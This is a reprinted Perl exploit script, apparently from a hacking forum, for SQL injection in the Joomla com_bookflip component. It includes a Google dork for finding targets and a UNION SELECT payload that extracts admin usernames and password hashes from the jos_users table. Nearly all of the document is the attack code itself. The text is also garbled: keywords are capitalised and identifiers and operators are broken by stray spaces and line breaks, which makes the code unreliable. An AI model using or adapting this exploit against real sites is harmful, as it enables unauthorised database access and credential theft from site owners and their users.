This article can be discussed here by partners: http://bbs.2cto.com/read.php? Tid = 89414
Author:CrackkeyReprinted please indicate from the red black customer Alliance (www.2cto.com)
#! /Usr/bin/perl-w
# Joomla com_bookflip (book_id) SQL injection #
########################################
# [~] Author: boom3rang
# [~] Greetz: [url = mailto: H! Tm @ N] H! Tm @ N [/url]-KHG-cHs-LiTTLE-HaCkEr-SpywarrioR-cRu3l. b0y-Lanti-Net-urtan
#---------------------------------------
# [!] <Name> BookFlip </name>
# [!] <CreationDate> Juin 2008 </creationDate>
# [!] <Author> fci f-Cimag-In </author>
# [!] <Copyright> Ce composant est distribu é gratuitement. </copyright>
# [!] <AuthorEmail> postmaster@f-cimag-in.com </authorEmail>
# [!] <AuthorUrl> www.f-cimag-in.com </authorUrl>
# [!] <Version> 2.1 </version>
#---------------------------------------
# [!] Google_Dork: inurl: "com_bookflip"
########################################
System ("color FF0000 ");
Print "###################################### #########################";
Print "# Kosova Hackers Group (KHG-CREW )#";
Print "###################################### #########################";
Print "#-Joomla com_bookflip (book_id) Remote SQL Injection Vuln #";
Print "#-R. I. P redc00de #";
Print "#-Cod3d by boom3rang #";
Print "###################################### #########################";
Use LWP: UserAgent;
Print "Target page: [http://wwww.localhost/pathdir/#:";
Chomp (my $ target = <STDIN> );
# Column Name
$ C_n = "concat (username, 0x3a, password )";
# Table_name
$ T_n = "jos_users ";
$ U = "-9999 + UNION + SELECT + ";
$ B = LWP: UserAgent-> new () or die "cocould not initialize browser ";
$ B-> agent (Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 ));
$ Host = $ target. "/index. php? Option = com_bookflip & book_id = ". $ U." 1, ". $ c_n.", 3, 4, 5, 6, 7, 8, 9, 0, 11, 12, 13,
, + From/**/". $ t_n." + -- + ";
$ Res = $ B-> request (HTTP: Request-> new (GET => $ host ));
$ Answer = $ res-> content; if ($ answer = ~ /([0-9a-fA-F] {32 })/){
Print "[+] Admin Hash: $1 ";
Print "# Veprimi mbaroi me sukses (Congratulations )! #";
}
Else {print "[-] Veprimi Deshtoi (Not Found )...";
}
########################
#-Proud 2 be Albanian
#-Proud 2 be Muslim
########################
# CrackkeyNet 2009.06.29
Vcking.cn "> http://www.fvcking.cn